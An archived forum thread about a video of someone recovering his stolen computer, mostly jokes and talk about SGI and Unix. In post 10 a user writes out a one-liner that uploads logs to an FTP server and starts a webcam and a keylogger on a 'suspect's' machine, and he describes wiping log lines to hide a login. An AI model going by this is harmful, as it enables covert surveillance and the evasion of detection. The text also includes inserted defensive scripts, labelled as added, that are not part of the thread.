
What Happens When You Steal A Hacker's Computer

Discussion in 'Computers' started by Clarkie, Feb 24, 2011.

  1. Clarkie

    Clarkie Newbie
    Thread Starter

    ipodman likes this.
  2. MoodyBlues

    MoodyBlues Choose compassion over cruelty
    That was great. :)
     
  3. brad-short

    brad-short Well-Known Member

    Great post, that guy is a Ledge! Bet the dood just bought it off someone tho! lol
     
  4. HKM


    LOL enjoyed this... even when I am blacklisted the old era brings me back good ol memories.
     
  5. Njcellgeek74

    Njcellgeek74 Well-Known Member
    Love it! That guy is awesome!
     
  6. mrspeedmaster

    mrspeedmaster Android Expert
    Great video...

    That's exactly the reason why I run:

    Mac OSX
    Linux
    AIX
    Solaris
    BSD
    and of course, my all time favorite.. IRIX 6.5

    You can never do that with Windows.
     
  7. r0ckstarr

    r0ckstarr Well-Known Member
    That was great! Thanks for posting this.
     
  8. HKM



    Who told you that you can't do that with Windows? As far as naming a few OSes goes, that doesn't impress anyone as it means nothing. I've been using *nix for close to 12+ years now; matter of fact, people used to call me "hack", but that subject I'm not getting into as I'm blacklisted now.

     
  9. MoodyBlues

    MoodyBlues Choose compassion over cruelty
    I agree. Although, to be fair, I don't know what windoze can or cannot do at this point as I haven't had the misfortune of touching it in a long time. When I purchased one of my most recent computers I actually booted it up to see what Vista was all about. After a few minutes--during which time I was idiot-prompted a million times--I didn't CARE and quickly rebooted, wiped the drive, and installed Linux.

    Considering that *nix started from the ground up as a multi-user, multi-tasking, multi-location, networked OS with security at its forefront, it's kind of a no-brainer that windoze will never compare.
     
  10. mrspeedmaster

    mrspeedmaster Android Expert
    Get back to me when I can SSH into my Windows box from a 5-year-old MOBILE phone and run a command like this without even getting caught by the suspect:

    tar -c /var/log/system.log | gzip > /tmp/syslog.tgz; ftp -u ftp://me:mypass@ftp.myftp.com/ - `date +%m%d%H%M`.tgz syslog.tgz; /tmp/syslog.tgz ; /etc/init.d/web-cam start; /etc/init.d/keylogger restart -o /tmp/log_this_****er_keyoutputfile.txt

    Tars a folder, gzips it, uploads it to a server w/ a timestamp in the file name, deletes the temp tgz file, starts my USB camera service, and starts my keylogger in ONE swoop.

    NO GUI can do this in one execution from one app w/ one click

    I can even get more complicated.

    In one command line you can zip up all the log files you want, you can add new host rules, start daemon processes (e.g. camera frame grabber), add a keylogger, AWK the relevant log records you need, open a port, upload your data, and most importantly, delete the last few lines of the system log files to delete any trace you were logged into the system.

    Windows Server has some DOS powertool commands. There is also Cygwin (but you are basically running a POSIX emulation layer). You are pretty much reliant on the Windows GUI, which can lead to you getting caught by your suspect.

    But in order to do what I gave an example of, you'd literally need to VNC/RDP in.

    Even if you get CLI console access, you have to rely on apps that have CLI equivalents, like creating a thumbnail snapshot from the built-in camera.

    For 99% of Windows users and even Windows admins, you have to do most of that through a GUI. If you wanted to install software to do something, most likely it will leave visible traces such as new app icons on the start menu, icons on the desktop, registry entries, etc.

    In UNIX, adding a keylogger and usb web camera daemon are command line daemon process executables.

    With UNIX, it is much more powerful and elegant to do it in the CLI. You can install keyloggers, create open ports using IPFW rules and do all the stuff MUCH easier in UNIX. I wonder, can you even console into a Windows box and delete registry entries that showed any trace of your login?
    The fact you can do this with any terminal client makes it even more powerful. You can do this with a smartphone, an iPad, a PDA. I remotely log in to my home computer with 5-year-old cell phones all the time. Trying to use RDP to a Windows machine with a small 3.2 phone screen isn't very practical.


    Notice how I said much easier in UNIX. It is easier because you don't need a GUI app, a setup.exe or even a vbscript to do what is done in that video.
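
Post 10 mentions deleting the last few lines of the system log files to remove traces of a login. Seen from the defender's side, the following added example (not part of any post in this thread) records a size-and-hash baseline of an append-only log and flags later shrinkage or edits; the baseline format, function names and sample log lines are constructed for illustration, and `sha256sum` or `shasum` is assumed to be installed.

```shell
#!/bin/sh
# Added example: detect truncation or in-place edits of an append-only log.
# Baseline format (constructed here): "<size_bytes> <sha256_of_those_bytes>".

hash_stdin() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum; else shasum -a 256; fi |
        cut -d' ' -f1
}

# log_baseline LOGFILE: print "<size> <hash>" for the current contents.
log_baseline() {
    size=$(wc -c < "$1" | tr -d ' ')
    printf '%s %s\n' "$size" "$(head -c "$size" "$1" | hash_stdin)"
}

# log_verify LOGFILE BASELINE_FILE
# Returns 0 if the baselined bytes are intact (the file may have grown),
# 1 if the file shrank, 2 if the baselined bytes were modified.
log_verify() {
    read -r old_size old_hash < "$2"
    new_size=$(wc -c < "$1" | tr -d ' ')
    if [ "$new_size" -lt "$old_size" ]; then
        echo "ALERT: $1 shrank from $old_size to $new_size bytes"
        return 1
    fi
    if [ "$(head -c "$old_size" "$1" | hash_stdin)" != "$old_hash" ]; then
        echo "ALERT: first $old_size bytes of $1 were modified"
        return 2
    fi
    echo "OK: baseline intact, $((new_size - old_size)) bytes appended since"
}

# Demo on a constructed log: take a baseline, then drop the last line.
demo_dir=$(mktemp -d)
cat > "$demo_dir/system.log" <<'EOF'
Feb 24 10:00:01 host sshd[101]: Accepted password for user from 192.0.2.10
Feb 24 10:00:05 host sudo: user : TTY=pts/0 ; COMMAND=/bin/sh
EOF
log_baseline "$demo_dir/system.log" > "$demo_dir/baseline"
log_verify "$demo_dir/system.log" "$demo_dir/baseline" || echo "status $?"
sed '$d' "$demo_dir/system.log" > "$demo_dir/edited"
mv "$demo_dir/edited" "$demo_dir/system.log"
log_verify "$demo_dir/system.log" "$demo_dir/baseline" || echo "status $?"
rm -rf "$demo_dir"
```

Keep the baseline off the host, since anyone with root can rewrite it along with the log, and expect status 1 after legitimate log rotation. Lines written and removed between two baselines are not caught, which is why logs are usually also forwarded to a remote collector.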
     
  11. mikedt

    mikedt 你好
    Do you have an SGI MIPS workstation or something? Similar with whatever hardware AIX runs on, an old PS/2 or IBM mainframe?

    SGI is ceasing MIPS IRIX, isn't it, in favour of Linux running on x86 hardware.
    http://www.sgi.com/support/services/irix_mips_support.html
     
  12. mrspeedmaster

    mrspeedmaster Android Expert
    Irix is dead, abandonware. I run it for nostalgic reasons.

    I have a SGI O2 and an INDY workstation from previous jobs.
    I also have some rare SGI NT rack servers. Back in the dot-com days, I had a beautiful SGI Indy setup w/ the ultrawide SGI LCD 19". My workstation was like $8,000 and it was awesome. I miss those days.

    Irix is the most beautiful OS there is.
    Indigo Magic Desktop blows everything away. Vector-based icons that were fully scalable.
    The User interface was gorgeous.
    Somebody should make a clone of Magic Desktop as a windows manager for Linux.


    I run AIX via a server. Basically just SSH into client's servers.

    I'm trying to get A/UX running now. Apple's first UNIX for Motorola 68000 CPUs like the old Mac Plus.
    That is more of a hobby though; running vintage OSes.
     
    mikedt likes this.
  13. mikedt

    mikedt 你好
    MaXX Interactive Desktop Community Edition
    This sure looks very similar to SGI's Magic Desktop.
     
  14. mrspeedmaster

    mrspeedmaster Android Expert
    That project has been inactive for about 2 years now. Not much activity.

    I really miss SGI. Awesome hardware.
    Servers that could go up to 512 CPUs, 1TB of RAM back in the early 2000s.

    They had chassis where you could pull out RAM, add CPUs on live running systems without re-booting using NUMALINK bricks.
    Incredible technology that is 15-20 years ahead of its time.

    I don't even think you can do that with Linux & x86/x64 Intel CISC architecture. They were literally, true super computers.
    Unfortunately, Intel CISC is cheaper and Linux is free, which led to SGI's death.

    XFS filesystem was its trump card over Solaris/AIX. We had some good flame wars back then. Irix vs Solaris.
     
  15. Snow_Fox

    Snow_Fox Android Expert
    Um... while it is cool to be able to do all of that..

    doesn't it also equate to a boat load of security holes in systems outside of windows?

    I am trying to create a keylogger for Windows right now and it's complex.

    *NOTE*

    I am an enrolled CMPS Major at a university and we are doing this as the project we picked.

    I am really worried about grabbing people's FB passwords for petty vengeance or stealing people's identities..

    We just had to pick a project and it seemed different.
     
  16. mrspeedmaster

    mrspeedmaster Android Expert
    Not in the context of this video.

    It is not a security hole whatsoever if you are the Administrator, ROOT, SuperUser of your own machine.

    You should be able to run whatever you want. The guy's machine was stolen and he simply used common sense things to get his machine back. I would have done things differently.

    It wasn't really hacking. The guy was just funny w/ his Southern and Australian accent. The commentary is what made the video funny.

    In fact, it is all junior level-sysadmin stuff.
     
  17. Snow_Fox

    Snow_Fox Android Expert
    Oh don't mistake me I am very familiar with all the terminology and how he did it and just thought "oh god if I ever have something stolen, I hope I am that lucky."

    But, I was more commenting on your ability to do everything you stated above from a mobile phone..

    You said you could do it all from one command.. and I could be wrong as I am not extremely familiar with command prompt as I would like to be.. But, I saw no commands dictating super user/root/admin status which (I suppose I'm stupid) could be taken to mean you could hypothetically do it from any 5 year old mobile phone and root was not required meaning if someone were capable of figuring out one or two details your entire system is compromised.

    You have to understand I have minimal experience in linux (although I do love using it when I can)
     
  18. mrspeedmaster

    mrspeedmaster Android Expert
    When you log in, you can log in as root.

    ssh root@mycomputer.dyndns.org

    or you elevate yourself to root

    ssh user@mycomputer.dyndns.org
    then you elevate yourself to root by
    # sudo -s
    or
    # su

    Once you are root, you can do whatever.
    You can run multiple commands by daisy chaining with ";"
    E.G.

    more logs | grep 'find entry' > /tmp/find.txt;cp /tmp/find.txt /volumes/copy; rm /tmp/find.txt

    With one line, I ran 3 commands in sequence. Basically, daisy chaining your commands.
    I first scanned a log file w/ a keyword. Piped it to a temp file. Then I copied the temp file to a new location and lastly, I removed the temp file. I didn't have to interact with it after I executed it.

    You can do this from an Android phone or an iPhone.
    I use an Incredible w/ Connectbot and with the middle trackpad, it is like using a regular console for me.

    Of course with a phone, you'd probably want to type out your commands in a text editor/notepad then copy-n-paste them into your shell to minimize mistakes. Or, type it out as a bash script on your phone and just scp the script (which has all your commands in sequences) to the host and run the scp file.

    Edit: BTW, there have been SSH terminal clients on Nokia Symbian/Windows machines as far back as 8 years. I've been doing this stuff off WinMo phones since 1994. Phones like the Cingular 2125, Blackjack, HTC Touch Pro, etc., connecting to my OSX machine.
    No rooting required. You just need a good terminal emulator to console into your host. Command line will be more efficient, reliable over slow cellular connections versus running something like VNC.

    Don't get me started on what you can do w/ an iPad. Remote X11.
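
The three-command chain in post 18 is joined with ";", which runs every command whether or not the previous one succeeded, and it writes as root to a fixed file name in /tmp. The following added example (not from the thread) puts that chain next to a version that uses `mktemp` and checks each step, so a failed copy is reported instead of masked; function names, paths and log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: unchecked ';' chain vs. a checked chain for grep -> cp -> rm.

# chain_semicolon LOG PATTERN DESTDIR: same shape as the chain in post 18.
# Every step runs regardless of the one before; the exit status is rm's.
chain_semicolon() {
    tmp="${TMPDIR:-/tmp}/find.$$"      # predictable name, like /tmp/find.txt
    grep -- "$2" "$1" > "$tmp"; cp "$tmp" "$3/find.txt" 2>/dev/null; rm "$tmp"
}

# chain_checked LOG PATTERN DESTDIR
# Returns 0 on success, 1 if nothing matched, 2 if the temp file or copy failed.
chain_checked() {
    # mktemp picks an unpredictable name and creates the file with mode 0600.
    tmp=$(mktemp "${TMPDIR:-/tmp}/find.XXXXXX") || return 2
    result=0
    if ! grep -- "$2" "$1" > "$tmp"; then
        result=1
    elif ! cp "$tmp" "$3/find.txt" 2>/dev/null; then
        result=2
    fi
    rm -f "$tmp"                       # cleanup always runs; result is kept
    return "$result"
}

# Demo on a constructed log. The destination directory does not exist,
# so the copy fails in both versions.
demo=$(mktemp -d)
printf '%s\n' 'sshd[101]: Failed password for root' 'cron[7]: job done' > "$demo/logs"
chain_semicolon "$demo/logs" 'Failed password' "$demo/missing" &&
    echo "semicolon chain: status 0, copy failure masked, temp file gone"
chain_checked "$demo/logs" 'Failed password' "$demo/missing" ||
    echo "checked chain: status $?"
rm -rf "$demo"
```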
     
  19. ipodman

    ipodman Newbie
    Had me laughing, great Vid.
     
  20. Bob Cat

    Bob Cat Careful, They're sharp!!
    Whew my head hurts after that.:D
     
